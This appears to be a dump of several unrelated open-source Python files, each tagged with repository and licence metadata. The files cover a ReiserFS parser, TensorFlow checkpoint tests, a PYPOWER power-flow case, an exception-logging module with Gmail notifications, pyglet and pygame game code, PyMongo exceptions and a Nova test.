yield NullBytes(self, "unused", 88)
yield NullBytes(self, "Bytes before end of the block", self["blocksize"].value-204)
def createDescription(self):
return "Superblock: ReiserFs Filesystem"
class REISER_FS(Parser):
PARSER_TAGS = {
"id": "reiserfs",
"category": "file_system",
# 130 blocks before the journal +
# Minimal size of journal (513 blocks) +
# 1 block for the rest
# And The Minimal size of a block is 512 bytes
"min_size": (130+513+1) * (512*8),
"description": "ReiserFS file system"
}
endian = LITTLE_ENDIAN
# Offsets (in bytes) of important information
SUPERBLOCK_OFFSET = 64*1024
MAGIC_OFFSET = SUPERBLOCK_OFFSET + 52
def validate(self):
# Let's look at the magic field in the superblock
magic = self.stream.readBytes(self.MAGIC_OFFSET*8, 9).rstrip("\0")
if magic in ("ReIsEr3Fs", "ReIsErFs", "ReIsEr2Fs"):
return True
return "Invalid magic string"
def createFields(self):
yield NullBytes(self, "padding[]", self.SUPERBLOCK_OFFSET)
yield SuperBlock(self, "superblock")
yield BitmapBlockGroup(self, "Group of bitmap blocks")
| gpl-3.0 |
korepwx/tfsnippet | tests/scaffold/test_checkpoint.py | 1 | 6954 | import os
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet.scaffold import *
from tfsnippet.scaffold.checkpoint import CHECKPOINT_VAR_NAME
from tfsnippet.utils import ensure_variables_initialized, TemporaryDirectory
class CheckpointSaverTestCase(tf.test.TestCase):
def test_constructor(self):
with TemporaryDirectory() as tmpdir:
v1 = tf.get_variable('v1', dtype=tf.int32, shape=())
with tf.variable_scope('parent'):
v2 = tf.get_variable('v2', dtype=tf.int32, shape=())
sv = ScheduledVariable('sv', dtype=tf.float32, initial_value=123)
obj = Mock(
spec=CheckpointSavableObject,
get_state=Mock(return_value={'value': 123}),
set_state=Mock()
)
obj2 = Mock(
spec=CheckpointSavableObject,
get_state=Mock(return_value={'value': 456}),
set_state=Mock()
)
saver = CheckpointSaver([v1, sv, v2], tmpdir + '/1',
objects={'obj': obj, 'obj2': obj2})
self.assertEqual(saver.save_dir, tmpdir + '/1')
self.assertIsNone(saver._saver._max_to_keep)
self.assertTrue(saver.save_meta)
self.assertDictEqual(
saver._var_dict,
{'v1': v1, 'parent/v2': v2, 'sv': sv.variable,
CHECKPOINT_VAR_NAME: saver._serial_var.variable}
)
self.assertIsInstance(saver.saver, tf.train.Saver)
saver = CheckpointSaver(
{'vv1': v1, 'v22': v2, 'svv': sv},
tmpdir + '/2',
objects={'oobj': obj, 'obj2': obj2},
filename='variables.dat',
max_to_keep=3, save_meta=False
)
self.assertEqual(saver.save_dir, tmpdir + '/2')
self.assertEqual(saver._saver._max_to_keep, 3)
self.assertFalse(saver.save_meta)
self.assertDictEqual(
saver._var_dict,
{'vv1': v1, 'v22': v2, 'svv': sv.variable,
CHECKPOINT_VAR_NAME: saver._serial_var.variable}
)
self.assertIsInstance(saver.saver, tf.train.Saver)
with pytest.raises(TypeError, match='Not a variable'):
_ = CheckpointSaver([object()], tmpdir)
with pytest.raises(TypeError, match='Not a variable'):
_ = CheckpointSaver([tf.constant(123.)], tmpdir)
with pytest.raises(TypeError, match='Not a savable object'):
_ = CheckpointSaver([], tmpdir, {'obj': object()})
with pytest.raises(TypeError, match='Not a savable object'):
_ = CheckpointSaver([], tmpdir, {'obj': tf.constant(0.)})
with pytest.raises(KeyError,
match='Name is reserved for `variables`'):
_ = CheckpointSaver(
[tf.get_variable(CHECKPOINT_VAR_NAME, dtype=tf.int32,
initializer=0)],
tmpdir
)
with pytest.raises(KeyError,
match='Name is reserved for `variables`'):
_ = CheckpointSaver(
{CHECKPOINT_VAR_NAME: tf.get_variable(
'a', dtype=tf.int32, initializer=0)},
tmpdir
)
with pytest.raises(KeyError,
match='Name is reserved for `objects`'):
_ = CheckpointSaver([], tmpdir, {CHECKPOINT_VAR_NAME: obj})
def test_save_restore(self):
class MyObject(CheckpointSavableObject):
def __init__(self, value):
self.value = value
def get_state(self):
return self.__dict__
def set_state(self, state):
keys = list(self.__dict__)
for k in keys:
if k not in state:
self.__dict__.pop(k)
for k in state:
self.__dict__[k] = state[k]
with TemporaryDirectory() as tmpdir, \
self.test_session() as sess:
save_dir = os.path.join(tmpdir, 'saves')
v = tf.get_variable('v', dtype=tf.int32, initializer=12)
sv = ScheduledVariable('sv', dtype=tf.float32, initial_value=34)
obj = MyObject(56)
obj2 = MyObject(90)
ensure_variables_initialized()
# test construct a saver upon empty directory
saver = CheckpointSaver([v, sv], save_dir,
objects={'obj': obj, 'obj2': obj2})
self.assertIsNone(saver.latest_checkpoint())
with pytest.raises(IOError, match='No checkpoint file is found'):
saver.restore_latest()
saver.restore_latest(ignore_non_exist=True, session=sess)
# save the first checkpoint
ckpt_0 = saver.save(0)
self.assertEqual(saver.latest_checkpoint(), ckpt_0)
# now we change the states
sess.run(tf.assign(v, 1212))
sv.set(3434)
obj.value = 5656
obj.value2 = 7878
obj2.value = 9090
ckpt_1 = saver.save(1, session=sess)
self.assertEqual(saver.latest_checkpoint(), ckpt_1)
# construct a saver on existing checkpoint directory
saver = CheckpointSaver([v, sv], save_dir,
objects={'obj': obj, 'obj2': obj2})
self.assertEqual(saver.latest_checkpoint(), ckpt_1)
# restore the latest checkpoint
saver.restore_latest()
self.assertListEqual(sess.run([v, sv]), [1212, 3434])
self.assertEqual(obj.value, 5656)
self.assertEqual(obj.value2, 7878)
self.assertEqual(obj2.value, 9090)
# restore a previous checkpoint
saver.restore(ckpt_0, sess)
self.assertListEqual(sess.run([v, sv]), [12, 34])
self.assertEqual(obj.value, 56)
self.assertFalse(hasattr(obj, 'value2'))
self.assertEqual(obj2.value, 90)
# try to restore only a partial of the variables and objects
saver = CheckpointSaver([v], save_dir, objects={'obj': obj})
saver.restore_latest()
self.assertListEqual(sess.run([v, sv]), [1212, 34])
self.assertEqual(obj.value, 5656)
self.assertEqual(obj.value2, 7878)
self.assertEqual(obj2.value, 90)
# try to restore a non-exist object
saver = CheckpointSaver([v], save_dir, objects={'obj3': obj})
with pytest.raises(KeyError, match='Object `obj3` not found in the '
'checkpoint'):
saver.restore_latest()
| mit |
praba230890/PYPOWER | pypower/case6ww.py | 2 | 2963 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.
"""
from numpy import array
def case6ww():
"""Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.
Please see L{caseformat} for details on the case file format.
This is the 6 bus example from pp. 104, 112, 119, 123-124, 549 of
I{"Power Generation, Operation, and Control, 2nd Edition"},
by Allen. J. Wood and Bruce F. Wollenberg, John Wiley & Sons, NY, Jan 1996.
@return: Power flow data for 6 bus, 3 gen case from Wood & Wollenberg.
"""
ppc = {"version": '2'}
##----- Power Flow Data -----##
## system MVA base
ppc["baseMVA"] = 100.0
## bus data
# bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
ppc["bus"] = array([
[1, 3, 0, 0, 0, 0, 1, 1.05, 0, 230, 1, 1.05, 1.05],
[2, 2, 0, 0, 0, 0, 1, 1.05, 0, 230, 1, 1.05, 1.05],
[3, 2, 0, 0, 0, 0, 1, 1.07, 0, 230, 1, 1.07, 1.07],
[4, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95],
[5, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95],
[6, 1, 70, 70, 0, 0, 1, 1, 0, 230, 1, 1.05, 0.95]
])
## generator data
# bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
# Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
ppc["gen"] = array([
[1, 0, 0, 100, -100, 1.05, 100, 1, 200, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 50, 0, 100, -100, 1.05, 100, 1, 150, 37.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[3, 60, 0, 100, -100, 1.07, 100, 1, 180, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
])
## branch data
# fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
ppc["branch"] = array([
[1, 2, 0.1, 0.2, 0.04, 40, 40, 40, 0, 0, 1, -360, 360],
[1, 4, 0.05, 0.2, 0.04, 60, 60, 60, 0, 0, 1, -360, 360],
[1, 5, 0.08, 0.3, 0.06, 40, 40, 40, 0, 0, 1, -360, 360],
[2, 3, 0.05, 0.25, 0.06, 40, 40, 40, 0, 0, 1, -360, 360],
[2, 4, 0.05, 0.1, 0.02, 60, 60, 60, 0, 0, 1, -360, 360],
[2, 5, 0.1, 0.3, 0.04, 30, 30, 30, 0, 0, 1, -360, 360],
[2, 6, 0.07, 0.2, 0.05, 90, 90, 90, 0, 0, 1, -360, 360],
[3, 5, 0.12, 0.26, 0.05, 70, 70, 70, 0, 0, 1, -360, 360],
[3, 6, 0.02, 0.1, 0.02, 80, 80, 80, 0, 0, 1, -360, 360],
[4, 5, 0.2, 0.4, 0.08, 20, 20, 20, 0, 0, 1, -360, 360],
[5, 6, 0.1, 0.3, 0.06, 40, 40, 40, 0, 0, 1, -360, 360]
])
##----- OPF Data -----##
## generator cost data
# 1 startup shutdown n x1 y1 ... xn yn
# 2 startup shutdown n c(n-1) ... c0
ppc["gencost"] = array([
[2, 0, 0, 3, 0.00533, 11.669, 213.1],
[2, 0, 0, 3, 0.00889, 10.333, 200],
[2, 0, 0, 3, 0.00741, 10.833, 240]
])
return ppc
| bsd-3-clause |
tomholub/tooth | tooth/log.py | 1 | 6337 | __author__ = 'Tom James Holub'
import sys
import pprint
import traceback
import string
import os
import datetime
import json
import thread
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from .config import Config
config = Config()
ACCESSDIR = config.get('path', 'access')
ERRORDIR = config.get('path', 'error')
EXCEPTIONDIR = config.get('path', 'exception')
SLASH = '/' if config.get('environment', 'os') == 'unix' else '\\'
DEBUG_EMAIL_FAILED = ERRORDIR + "DEBUG_EMAIL_FAILED"
MAX_SIMILAR_ERRORS_SAVED = 50
def access(identifiers, function, request, response, source='REQUEST'):
if "success" in response.keys():
filename = "anonymous" if not identifiers else '_'.join(map(str, identifiers))
filepath = "%s%s.log" % (ACCESSDIR, filename)
else:
filepath = "%s%s.log" % (ERRORDIR, 'error')
with open(filepath, "a") as myfile:
try:
json_request = json.dumps(request)
except TypeError:
json_request = "not serializabke, keys: %s" % (','.join(request.keys()))
myfile.write("[%s %s] %s ---------- %s\n" % (source, function, json.dumps(response), json_request))
def internal(filename, line):
with open("%s%s.log" % (ACCESSDIR, filename), "a") as myfile:
myfile.write("%s\n" % line)
def _formatted_exception_dir_name(exc_info):
exc_type, exc_value, exc_traceback = exc_info
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
unformatted = str(exc_type.__name__) + '___' + str(exc_value)
sanitized = ''.join(c for c in unformatted if c in valid_chars)
return 'E_' + sanitized.replace(' ', '_').replace('(', '_').replace(')', '_')[:100] + SLASH
def _notification_title(dir_name):
return 'New unhandled exception (' + dir_name[:100] + ')'
def _exception_text_array(dump, stdout, exc_info):
exc_type, exc_value, exc_traceback = exc_info
dump = dump or []
content = [
'############################################',
'# Stack Trace ##############################',
'############################################',
''
]
if exc_type is None:
return None
try:
if type(dump) == list:
dump.append(exc_value.data)
elif type(dump) == dict:
dump['exception'] = exc_value.data
elif dump is None:
dump = {'exception': exc_value.data}
except AttributeError:
pass
content += traceback.format_exception(exc_type, exc_value, exc_traceback)
content += ['', '#############', '# Data ######', '#############', '']
content += [pprint.pformat(dump)]
content += ['', '', '#############', '# Stdout ####', '#############', '']
content += [str(stdout)]
return content
def _exception_log_dir_exists(exception_log_dir_name):
return not os.path.exists(EXCEPTIONDIR + exception_log_dir_name)
def _exception(exception_text_array, exception_log_dir, first_occurence, send_email, save_file):
if first_occurence:
os.makedirs(EXCEPTIONDIR + exception_log_dir)
if (send_email is None and first_occurence) or (send_email == True):
send_email_notification(_notification_title(exception_log_dir), exception_text_array)
have_space = len(os.listdir(EXCEPTIONDIR + exception_log_dir)) < MAX_SIMILAR_ERRORS_SAVED
now = datetime.datetime.now()
file_name = now.strftime("exception_%Y-%m-%d_%H-%M-%S-") + str(now.microsecond).zfill(6) + ".log"
if (have_space and save_file is None) or (save_file == True):
sys.stderr.write("!!! Exception -> " + exception_log_dir + file_name + "\n")
with open(EXCEPTIONDIR + exception_log_dir + file_name, "w") as myfile:
myfile.write("\n".join(exception_text_array))
else:
sys.stderr.write("!!! Exception (not saved to file) -> " + exception_log_dir + "\n")
return exception_log_dir + file_name
def exception(dump=None, stdout='', exc_info=None, send_email=None, save_file=None):
exc_info = exc_info or sys.exc_info()
if exc_info is not None:
exception_log_dir_name = _formatted_exception_dir_name(exc_info)
exception_text_array = _exception_text_array(dump, stdout, exc_info)
first_occurence = _exception_log_dir_exists(exception_log_dir_name)
file_path = _exception(exception_text_array, exception_log_dir_name, first_occurence, send_email, save_file)
return file_path
def send_email_notification(subject, body):
send_through_gmail(subject, "<br/>".join(body).replace(' ', ' ').replace('\n', '<br/>'))
def _set_debug_email_failed_flag(exception=None):
try:
with open(DEBUG_EMAIL_FAILED, "w") as myfile:
myfile.write(str(exception))
except Exception, err:
print exception
print err
def send_through_gmail(subject, body):
try:
smtpserver = smtplib.SMTP("smtp.gmail.com", 587, timeout=10)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(config.get('gmail', 'email'), config.get('gmail', 'password'))
email_message_html = body
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = "Vincent Python <%s>" % config.get('gmail', 'email')
msg['To'] = "%s <%s>" % ('awesome hackers', config.get('environment', 'debug_email'))
# Record the MIME types of both parts - text/plain and text/html.
part1 = MIMEText(email_message_html, 'plain')
part2 = MIMEText(email_message_html, 'html')
msg.attach(part1)
msg.attach(part2)
smtpserver.sendmail(msg['From'], msg['To'], msg.as_string())
smtpserver.close()
# except (smtplib.SMTPAuthenticationError, smtplib.SMTPConnectError, socket.gaierror), err:
# set_debug_email_failed_flag(failed=True, exception=err)
except Exception, err:
if 'Connection refused' not in str(err): # it was just internet not available
_set_debug_email_failed_flag(exception=err)
class ThreadStdout:
def __init__(self):
self.thread_specific_outputs = {}
self.MAIN_THREAD = thread.get_ident()
def write(self, value):
if thread.get_ident() != self.MAIN_THREAD: # put all children threads stdouts into a separate storage
if thread.get_ident() not in self.thread_specific_outputs:
self.thread_specific_outputs[thread.get_ident()] = value
else:
self.thread_specific_outputs[thread.get_ident()] += value
else: # print all main thread stdouts the normal way
sys.__stdout__.write(value)
def flush(self):
sys.__stdout__.flush()
def clean(self):
if thread.get_ident() in self.thread_specific_outputs:
del self.thread_specific_outputs[thread.get_ident()]
def get(self):
return self.thread_specific_outputs[thread.get_ident()]
| bsd-3-clause |
theblacklion/pyglet | contrib/scene2d/examples/text_wrap.py | 29 | 1069 | #!/usr/bin/env python
'''Example of simple text wrapping without using layout.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from pyglet.gl import *
from pyglet.window import Window
from pyglet.window import key
from pyglet import clock
from pyglet import font
from scene2d.textsprite import *
window = Window(visible=False, resizable=True)
arial = font.load('Arial', 24)
text = 'Type away... '
@window.event
def on_resize(width, height):
sprite.width = width
sprite.x = 10
@window.event
def on_text(text):
sprite.text += text.replace('\r', '\n')
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.BACKSPACE:
sprite.text = sprite.text[:-1]
sprite = TextSprite(arial, text, color=(0, 0, 0, 1))
fps = clock.ClockDisplay()
window.push_handlers(fps)
glClearColor(1, 1, 1, 1)
window.set_visible()
while not window.has_exit:
window.dispatch_events()
clock.tick()
glClear(GL_COLOR_BUFFER_BIT)
sprite.y = sprite.height # TODO align on bottom
sprite.draw()
fps.draw()
window.flip()
| bsd-3-clause |
JulianH99/pygame2017 | Mundo/Escenario.py | 1 | 13586 | import sys as s
from math import floor
from pygame import *
from pygame.locals import *
from random import randint
from Obstaculo import *
from Laser import *
# clase escenrario
class Escenario():
# constantes
ORIENT_IZQ_DER = 0
ORIENT_DER_IZQ = 1
ORIENT_G_NOR = 2
ORIENT_G_INVER = 3
FONDOS={'NORMAL': image.load("Imagenes/fondoMovil1.png"),
'OBSTACULO': image.load("Imagenes/fondoObstaculo.png"),
'POWERUP_BUENO': image.load("Imagenes/fondoPowerupBueno.png"),
'POWERUP_MALO': image.load("Imagenes/fondoPowerupMalo.png"),
'AUMENTO_VELOCIDAD': image.load("Imagenes/fondoVelocidad.png"),
'PUNTAJE': image.load("Imagenes/fondoPuntaje.png")
}
# constructor
def __init__(self, velocidad,velocidadFondo, orientacion, ventana, ancho, alto):
# atributos
self.ancho = ancho # ancho de la ventana
self.alto = alto # alto de la ventana
self.velocidadFondo = velocidadFondo # velocidad del fondo
self.velocidad = velocidad # velocidad que tendra el escenario y sus obstaculos
self.dirVel = 1 # direccion de la velocidad
self.fondo = [self.FONDOS['NORMAL'],self.FONDOS['NORMAL']] # imagen del fondo del escenario
self.orientacion = orientacion # orientacion del escenario
self.obstaculos = [] # lista de obstaculos que van apareciendo
self.rect = [self.fondo[0].get_rect(),self.fondo[1].get_rect()] # obtencion de un retcnagulo del fondo
self.rect[0].left = 0 # posicion izquierda del fondo
self.rect[0].top = 0 # posicion de arriba del fondo
self.rect[1].left = ancho # posicion izquierda del fondo
self.rect[1].top = 0 # posicion de arriba del fondo
# elementos plataforma abajo
self.plataforma = [image.load("Imagenes/plataformaA.png"),image.load("Imagenes/plataformaA.png")]
self.rectPlataforma = [self.plataforma[0].get_rect(),self.plataforma[1].get_rect()]
self.rectPlataforma[0].left = 0 # posicion izquierda de la plataforma
self.rectPlataforma[0].bottom = alto-50 # posicion de arriba de la plataforma
self.rectPlataforma[1].left = ancho # posicion izquierda de la plataforma
self.rectPlataforma[1].bottom = alto-50 # posicion de arriba de la plataforma
# elementos plataforma arriba
self.plataformaA = [image.load("Imagenes/plataforma.png"), image.load("Imagenes/plataforma.png")]
self.rectPlataformaA = [self.plataformaA[0].get_rect(), self.plataformaA[1].get_rect()]
self.rectPlataformaA[0].left = 0 # posicion izquierda del plataforma
self.rectPlataformaA[0].top = 0 # posicion de arriba de la plataforma
self.rectPlataformaA[1].left = ancho # posicion izquierda de la plataforma
self.rectPlataformaA[1].top = 0 # posicion de arriba de la plataforma
self.posX = 0 # posicion donde comienza a crerarse los obstaculos
self.ventana = ventana # ventan donde se colocara el escenario
self.__aux1= 0
self.__aux2 = 0
self.__auxTiempoFondo = 0
self.__cont=0
# generador aleatorio de obstaculos
def generarObstaculos(self, puntaje, tiempo):
#self.cambiarFondo(self.FONDOS['NORMAL'])
self.tiempo = tiempo
self.__cambiarOrientacion()
# velocidad varia cada 30 segundos
if tiempo != self.__aux1 and tiempo % 300 == 0:
self.__aux1 = tiempo
self.velocidad += (self.dirVel*self.dirVel)
trueno=mixer.Sound("Sonidos/rayo.wav")
trueno.play()
self.cambiarFondo(self.FONDOS['AUMENTO_VELOCIDAD'])
r = randint(20,70)
if tiempo!=self.__aux2 and tiempo % r == 0:
self.__aux2 = tiempo
listObstaculos=[]
o = randint(0,2)
arriba = randint(0, 1)
# creacion laser
laser = Laser("Imagenes/laserA.png", "Imagenes/laserD.png", self.posX, 311, -10, "Sonidos/laser.wav")
listObstaculos.append(laser)
# creacion muro
if arriba == 0:
posY = 40 + self.rectPlataformaA[0].height
else:
posY = self.alto - 40 - self.rectPlataforma[0].height
pared = Obstaculo("Imagenes/pared.png",self.posX, posY, Obstaculo.PARED, "Sonidos/pared.wav")
listObstaculos.append(pared)
# creacion puas
if arriba == 0:
posY = 23+ self.rectPlataformaA[0].height
puas = Obstaculo("Imagenes/puasA.png", self.posX, posY, Obstaculo.PUAS, "Sonidos/shoot.wav")
else:
posY = self.alto -23 - self.rectPlataforma[0].height
puas = Obstaculo("Imagenes/puas1.png", self.posX, posY, Obstaculo.PUAS,"Sonidos/shoot.wav")
listObstaculos.append(puas)
if self.__verificiacionObstaculos(listObstaculos[o]):
self.obstaculos.append(listObstaculos[o])
"""self.obstaculos[len(self.obstaculos) - 1].rect.left -= 20
self.obstaculos.append(listObstaculos[o])
print("Entra 2")"""
"""
if tiempo!=self.__aux2 and tiempo % (20 - self.cantidad) == 0:
self.__aux2 = tiempo
rand = randint(0, 1000)
arriba = randint(0,1)
# genera lasers
if rand % 10 == 0:
laser = Laser("Imagenes/laserA.png","Imagenes/laserD.png",self.ancho, 311, 10)
self.obstaculos.append(laser)
# genera paredes
elif rand < 1000:
for x in range(5):
if arriba == 0:
posY = 40 + self.rectPlataformaA[0].height
else:
posY = self.alto-40-self.rectPlataforma[0].height
pared = Obstaculo("Imagenes/pared.png", self.ancho, posY, 10)
self.obstaculos.append(pared)
# genera chuzos
elif 1<rand<50:
for x in range(3):
if arriAba == 0:
posY = 40 + self.rectPlataformaA[0].height
else:
posY = self.alto-40-self.rectPlataforma[0].height
chuzo = Obstaculo("Imagenes/pared.png", self.ancho, posY, 10)
self.obstaculos.append(pared)
"""
# verficacion espacio entrew obstaculos
def __verificiacionObstaculos(self, obstaculo):
if int(len(self.obstaculos))==0:
#print(len(self.obstaculos))
return True
else:
ultimoObstaculo = self.obstaculos[len(self.obstaculos)-1]
if ultimoObstaculo.rect.top==self.obstaculos[len(self.obstaculos)-1].rect.top and (ultimoObstaculo.rect.left<=obstaculo.rect.left<=ultimoObstaculo.rect.right or ultimoObstaculo.rect.left<=obstaculo.rect.right<=ultimoObstaculo.rect.right):
#print("entra 2")
return False
else:
return True
# movimiento de los obstaculos
def movimientoObstaculos(self):
# veriificaion orientacion movimeinto
self.__cambiarOrientacion()
for obstaculo in self.obstaculos:
if type(obstaculo) is Laser:
if self.tiempo%15 == 0:
obstaculo.activar(True)
elif self.tiempo%3 == 0:
obstaculo.activar(False)
obstaculo.mover(self.velocidad*self.dirVel)
obstaculo.dibujar(self.ventana)
# remover obstaculos fuera de area
def removerObstaculo(self):
if self.ORIENT_IZQ_DER==self.orientacion:
for obstaculo in self.obstaculos:
if obstaculo.rect.left > self.ancho:
self.obstaculos.remove(obstaculo)
else:
for obstaculo in self.obstaculos:
if obstaculo.rect.right<0:
self.obstaculos.remove(obstaculo)
# comprobacion de la colision de la bolita con algun obstaculo
def colisionBolita(self, rect):
if rect.collidelist(self.obstaculos)!=-1:
i = rect.collidelist(self.obstaculos)
if type(self.obstaculos[i]) is not Laser:
self.cambiarFondo(self.FONDOS['OBSTACULO'])
if type(self.obstaculos[i]) is Laser:
if self.obstaculos[i].activo:
self.cambiarFondo(self.FONDOS['OBSTACULO'])
self.obstaculos[i].sonido.play()
return self.obstaculos[i].getValorDanio()
else:
self.cambiarFondo(self.FONDOS['NORMAL'])
return 0
else:
if self.__cont < 1:
self.obstaculos[i].sonido.play()
self.__cont += 1
return self.obstaculos[i].getValorDanio()
else:
self.cambiarFondo(self.FONDOS['NORMAL'])
self.__cont=0
return 0
# dibujar fondo infinito
def dibujarFondo(self, ventana):
ventana.blit(self.fondo[0],self.rect[0])
ventana.blit(self.fondo[1],self.rect[1])
# plataformas
ventana.blit(self.plataforma[0],self.rectPlataforma[0])
ventana.blit(self.plataforma[1], self.rectPlataforma[1])
#ventana.blit(self.plataformaA[0], self.rectPlataformaA[0])
#ventana.blit(self.plataformaA[1], self.rectPlataformaA[1])
# movimeinto del fondo
def moverFondo(self):
self.__cambiarOrientacion()
self.__restriccionFondo(self.rect)
self.__restriccionPlataforma(self.rectPlataforma, self.rectPlataformaA)
# fondo
self.rect[0].left -= (self.velocidadFondo*self.dirVel)
self.rect[1].left -= (self.velocidadFondo*self.dirVel)
# plataformas
self.rectPlataforma[1].left -= int(self.velocidad*self.dirVel)
self.rectPlataforma[0].left -= int(self.velocidad*self.dirVel)
self.rectPlataformaA[1].left -= int(self.velocidad*self.dirVel)
self.rectPlataformaA[0].left -= int(self.velocidad*self.dirVel)
# metodo para hacer movimientoinfinito fondo
def __restriccionFondo(self, fondoRect):
# verificacion oreintacion
if self.ORIENT_IZQ_DER == self.orientacion:
if fondoRect[0].right == self.ancho :
fondoRect[1].right = self.velocidadFondo
elif fondoRect[1].right == self.ancho:
fondoRect[0].right = self.velocidadFondo
else:
if fondoRect[0].left == -self.velocidadFondo:
fondoRect[1].left = self.ancho - self.velocidadFondo
elif fondoRect[1].left == -self.velocidadFondo:
fondoRect[0].left = self.ancho - self.velocidadFondo
# metodo para hacer movimientoinfinito pltaforma
def __restriccionPlataforma(self, fondoRect, rect2):
# verificacion oreintacion
if self.ORIENT_IZQ_DER == self.orientacion:
if fondoRect[0].left > self.ancho:
# plataforma abajo
fondoRect[0].right = 0
fondoRect[1].left = fondoRect[0].right
# plataforma arriba
rect2[0].right = 0
rect2[1].left = rect2[0].right
elif fondoRect[1].left > self.ancho:
# plataforma abajo
fondoRect[1].right = 0
fondoRect[0].left = fondoRect[1].right
# plataforma arriba
rect2[1].left = int(self.ancho - (self.velocidad*self.dirVel))
rect2[0].right = rect2[1].left
rect2[1].right = 0
rect2[0].left = rect2[1].right
else:
if fondoRect[0].right < 0:
# plataforma abajo
fondoRect[0].left = int(self.ancho - (self.velocidad * self.dirVel))
fondoRect[1].right = fondoRect[0].left
# plataforma arriba
rect2[0].left = int(self.ancho - (self.velocidad * self.dirVel))
rect2[1].right = rect2[0].left
elif fondoRect[1].right < 0:
# plataforma abajo
fondoRect[1].left = int(self.ancho - (self.velocidad * self.dirVel))
fondoRect[0].right = fondoRect[1].left
# plataforma arriba
rect2[1].left = int(self.ancho - (self.velocidad * self.dirVel))
rect2[0].right = rect2[1].left
# cambair orientacion movimiento
def __cambiarOrientacion(self):
if self.orientacion == self.ORIENT_IZQ_DER:
self.dirVel = -1
self.posX=0
else:
self.dirVel = 1
self.posX = self.ancho
# cambiar fondo
def cambiarFondo(self,fondo):
self.fondo[0]=fondo
self.fondo[1]=fondo
# colocar danio en 0
def sinDanio(self):
for obstaculo in self.obstaculos:
self.obstaculos.sinDanio()
# restablecer danio
def restablecerDanio(self):
for obstaculo in self.obstaculos:
self.obstaculos.restablecerDanio()
# obtener valor velocidad
def getVelocidad(self):
return self.velocidad
# colocar valor velocidad
def setVelocidad(self, velocidad):
self.velocidad = velocidad
# obtenerOrientacion
def getOrientacion(self):
return self.orientacion
# colocarOrientacion
def setOrientacion(self, orientacion):
self.orientacion = orientacion
| gpl-3.0 |
couchbaselabs/litmus | lib/pymongo/errors.py | 3 | 2626 | # Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exceptions raised by PyMongo."""
from bson.errors import *
class PyMongoError(Exception):
"""Base class for all PyMongo exceptions.
.. versionadded:: 1.4
"""
class ConnectionFailure(PyMongoError):
"""Raised when a connection to the database cannot be made or is lost.
"""
class AutoReconnect(ConnectionFailure):
"""Raised when a connection to the database is lost and an attempt to
auto-reconnect will be made.
In order to auto-reconnect you must handle this exception, recognizing that
the operation which caused it has not necessarily succeeded. Future
operations will attempt to open a new connection to the database (and
will continue to raise this exception until the first successful
connection is made).
"""
class ConfigurationError(PyMongoError):
"""Raised when something is incorrectly configured.
"""
class OperationFailure(PyMongoError):
"""Raised when a database operation fails.
.. versionadded:: 1.8
The :attr:`code` attribute.
"""
def __init__(self, error, code=None):
self.code = code
PyMongoError.__init__(self, error)
class TimeoutError(OperationFailure):
"""Raised when a database operation times out.
.. versionadded:: 1.8
"""
class DuplicateKeyError(OperationFailure):
"""Raised when a safe insert or update fails due to a duplicate key error.
.. note:: Requires server version **>= 1.3.0**
.. versionadded:: 1.4
"""
class InvalidOperation(PyMongoError):
"""Raised when a client attempts to perform an invalid operation.
"""
class InvalidName(PyMongoError):
"""Raised when an invalid name is used.
"""
class CollectionInvalid(PyMongoError):
"""Raised when collection validation fails.
"""
class InvalidURI(ConfigurationError):
"""Raised when trying to parse an invalid mongodb URI.
.. versionadded:: 1.5
"""
class UnsupportedOption(ConfigurationError):
"""Exception for unsupported options.
.. versionadded:: 2.0
"""
| apache-2.0 |
felixma/nova | nova/tests/unit/objects/test_dns_domain.py | 70 | 3002 | # Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import db
from nova.objects import dns_domain
from nova.tests.unit.objects import test_objects
fake_dnsd = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': 0,
'domain': 'blah.example.com',
'scope': 'private',
'availability_zone': 'overthere',
'project_id': '867530niner',
}
class _TestDNSDomain(object):
@staticmethod
def _compare(test, db, obj):
for field, value in db.items():
test.assertEqual(db[field], obj[field])
def test_get_by_domain(self):
with mock.patch.object(db, 'dnsdomain_get') as get:
get.return_value = fake_dnsd
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self._compare(self, fake_dnsd, dnsd)
def test_register_for_zone(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
